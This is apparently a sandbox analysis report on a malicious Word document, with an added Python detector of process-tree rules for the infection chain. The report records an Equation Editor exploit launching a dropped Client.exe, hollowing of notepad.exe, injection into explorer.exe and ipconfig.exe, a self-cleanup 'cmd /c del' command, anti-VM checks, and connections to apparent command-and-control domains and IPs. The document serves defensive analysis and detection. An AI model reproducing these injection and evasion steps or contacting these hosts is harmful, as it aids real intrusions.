          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00A286CE push es; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00A24403 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003290F2 pushfd ; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003290DA push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00328F38 push eax; retn 002Dh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_003606AF push 036C4A39h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004AA4B6 push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004AA8B5 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D7CC7 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D7112 push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00873EBF push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00873ABB push edi; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_008746BB push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0087051F push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02407248 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02401E4D push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02404E5A push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403E63 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02402671 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02402E71 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406671 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02404672 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240261D push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406220 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02400A22 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403E22 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02406A32 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02403633 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02405E3B push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_024032E4 push 00000003h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_02405AEF push 00000003h; ret
          Source: Client.exe.0.dr | Static PE information: section name: 5++.8$
          Source: Client.exe.0.dr | Static PE information: section name:
          Source: initial sample | Static PE information: section name: 5++.8$ entropy: 7.999437666681734

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\notepad.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\notepad.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00409AB0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AB26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process queried: DebugPort
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process queried: DebugPort
Source: C:\Windows\SysWOW64\notepad.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00409AB0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004D33F8 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe | Network Connect: 104.167.67.175 80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.170 80
Source: C:\Windows\explorer.exe | Domain query: www.thegoldencamel.online
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
Source: C:\Windows\SysWOW64\notepad.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975D
Source: C:\Windows\SysWOW64\notepad.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\notepad.exe | Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\notepad.exe | Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 1860
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
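Read together, the lines above record the whole chain. The Equation Editor host EQNEDT32.EXE spawns cmd.exe to run %tmp%\Client.exe; Client.exe starts a SysWOW64 notepad.exe and hollows it: the original image at 0x400000 is unmapped, a new image whose bytes begin with MZ is written to 0x400000 and 0x401000, a pointer is written to 0x7EFDE008 (on this WOW64 guest the 32-bit PEB sits at 0x7EFDE000, so that is its ImageBaseAddress field), and a thread is created in the target. The hollowed notepad.exe then queues an APC into explorer.exe (PID 1860, the target of the thread-register writes), explorer.exe launches ipconfig.exe, ipconfig.exe is injected the same way, and finally ipconfig.exe runs cmd.exe /c del against the notepad.exe image used as the hollowing host. The Python below is an added example, not code from the report: it applies three parent/child rules taken from these lines to a constructed set of process-creation events. The PIDs (other than 1860), the command lines of explorer.exe and ipconfig.exe, and the parent of EQNEDT32.EXE are invented for the example; 1860 is assumed to be explorer.exe.

```python
"""Process-tree rules for the execution chain listed above.

Added example, not part of the Joe Sandbox report. The events at the bottom
are constructed from the report's "Process created" lines; PIDs other than
1860, the explorer.exe and ipconfig.exe command lines and the parent of
EQNEDT32.EXE are invented.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the process image
    cmdline: str


OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# "del <path>" or 'del "<path>"' at the end of a cmd.exe command line.
DEL_TARGET = re.compile(r'\bdel\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Image names from pid upwards, stopping at a parent not in the event set."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for the three behaviours the report shows."""
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = image_name(e.image)
        # Rule 1: Equation Editor has no legitimate reason to spawn a child.
        if parent is not None and image_name(parent.image) == "eqnedt32.exe":
            findings.append(("eqnedt32_child", f"EQNEDT32.EXE -> {name} (pid {e.pid}): {e.cmdline}"))
        # Rule 2: a binary run from %LOCALAPPDATA%\Temp with an Office host as an ancestor.
        lineage = ancestry(by_pid, e.pid)[1:]
        if "\\appdata\\local\\temp\\" in e.image.lower() and OFFICE_HOSTS.intersection(lineage):
            findings.append(("temp_binary_office_lineage", f"{name} <- " + " <- ".join(lineage)))
        # Rule 3: cmd.exe deleting the image of a process that is itself in the tree
        # (the report's ipconfig.exe -> cmd.exe /c del "...\notepad.exe" cleanup).
        if name == "cmd.exe":
            m = DEL_TARGET.search(e.cmdline)
            if m and m.group(1).lower() in known_images:
                parent_name = image_name(parent.image) if parent else "unknown"
                findings.append(("cleanup_del_process_image", f"pid {e.pid} (parent {parent_name}) deletes {m.group(1)}"))
    return findings


# Constructed events mirroring the report's chain.
SAMPLE_EVENTS = [
    ProcEvent(1860, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 600, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "EQNEDT32.EXE"),
    ProcEvent(1200, 1100, r"C:\Windows\SysWOW64\cmd.exe", r"CmD.exe /C %tmp%\Client.exe A C"),
    ProcEvent(1300, 1200, r"C:\Users\user\AppData\Local\Temp\Client.exe", r"C:\Users\user\AppData\Local\Temp\Client.exe A C"),
    ProcEvent(1400, 1300, r"C:\Windows\SysWOW64\notepad.exe", r"C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}"),
    ProcEvent(1500, 1860, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig.exe"),
    ProcEvent(1600, 1500, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Windows\SysWOW64\notepad.exe"'),
]


def run_example() -> List[Tuple[str, str]]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_example():
        print(f"{rule}: {detail}")
```

Rule 1 is actionable on its own: an Equation Editor that spawns cmd.exe has been exploited, whichever CVE was used. Rules 2 and 3 are corroboration and only become high-signal when joined on the process tree, which is what detect() does by resolving each event's ancestry before deciding. The injection steps themselves (cross-process writes to the image base and PEB, section unmap, remote thread) are not visible in process-creation events and need the memory-access telemetry the sandbox records above.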

          Stealing of Sensitive Information

Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
